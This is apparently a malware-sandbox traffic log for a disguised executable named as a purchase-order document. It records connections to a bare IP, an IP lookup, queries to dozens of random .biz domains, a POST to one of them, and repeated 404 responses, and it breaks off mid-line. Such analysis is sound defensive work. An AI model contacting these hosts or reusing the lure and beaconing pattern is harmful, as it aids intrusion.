Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile,

0_2_0044289D

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic	DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic	DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic	DNS traffic detected: DNS query: s82.gocheapweb.com
Source: global traffic	DNS traffic detected: DNS query: npukfztj.biz
Source: global traffic	DNS traffic detected: DNS query: przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: zlenh.biz
Source: global traffic	DNS traffic detected: DNS query: knjghuig.biz
Source: global traffic	DNS traffic detected: DNS query: uhxqin.biz
Source: global traffic	DNS traffic detected: DNS query: anpmnmxo.biz
Source: global traffic	DNS traffic detected: DNS query: lpuegx.biz
Source: global traffic	DNS traffic detected: DNS query: vjaxhpbji.biz
Source: global traffic	DNS traffic detected: DNS query: xlfhhhm.biz
Source: global traffic	DNS traffic detected: DNS query: ifsaia.biz
Source: global traffic	DNS traffic detected: DNS query: saytjshyf.biz
Source: global traffic	DNS traffic detected: DNS query: vcddkls.biz
Source: global traffic	DNS traffic detected: DNS query: fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: tbjrpv.biz
Source: global traffic	DNS traffic detected: DNS query: deoci.biz
Source: global traffic	DNS traffic detected: DNS query: gytujflc.biz
Source: global traffic	DNS traffic detected: DNS query: qaynky.biz
Source: global traffic	DNS traffic detected: DNS query: bumxkqgxu.biz
Source: global traffic	DNS traffic detected: DNS query: dwrqljrr.biz
Source: global traffic	DNS traffic detected: DNS query: nqwjmb.biz
Source: global traffic	DNS traffic detected: DNS query: ytctnunms.biz
Source: global traffic	DNS traffic detected: DNS query: myups.biz
Source: global traffic	DNS traffic detected: DNS query: oshhkdluh.biz
Source: global traffic	DNS traffic detected: DNS query: yunalwv.biz
Source: global traffic	DNS traffic detected: DNS query: jpskm.biz
Source: global traffic	DNS traffic detected: DNS query: lrxdmhrr.biz
Source: global traffic	DNS traffic detected: DNS query: wllvnzb.biz
Source: global traffic	DNS traffic detected: DNS query: gnqgo.biz
Source: global traffic	DNS traffic detected: DNS query: jhvzpcfg.biz
Source: global traffic	DNS traffic detected: DNS query: acwjcqqv.biz
Source: global traffic	DNS traffic detected: DNS query: lejtdj.biz
Source: global traffic	DNS traffic detected: DNS query: vyome.biz
Source: global traffic	DNS traffic detected: DNS query: yauexmxk.biz
Source: global traffic	DNS traffic detected: DNS query: iuzpxe.biz
Source: global traffic	DNS traffic detected: DNS query: sxmiywsfv.biz
Source: global traffic	DNS traffic detected: DNS query: vrrazpdh.biz
Source: global traffic	DNS traffic detected: DNS query: ftxlah.biz
Source: global traffic	DNS traffic detected: DNS query: typgfhb.biz
Source: global traffic	DNS traffic detected: DNS query: esuzf.biz
Source: global traffic	DNS traffic detected: DNS query: gvijgjwkh.biz
Source: global traffic	DNS traffic detected: DNS query: qpnczch.biz
Source: global traffic	DNS traffic detected: DNS query: brsua.biz

Source: unknown

HTTP traffic detected: POST /atfsybxv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 20 Oct 2024 16:42:02 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 20 Oct 2024 16:42:03 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 20 Oct 2024 16:42:17 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 20 Oct 2024 16:42:18 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 20 Oct 2024 16:42:22 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 20 Oct 2024 16:42:22 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 20 Oct 2024 16:42:35 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error 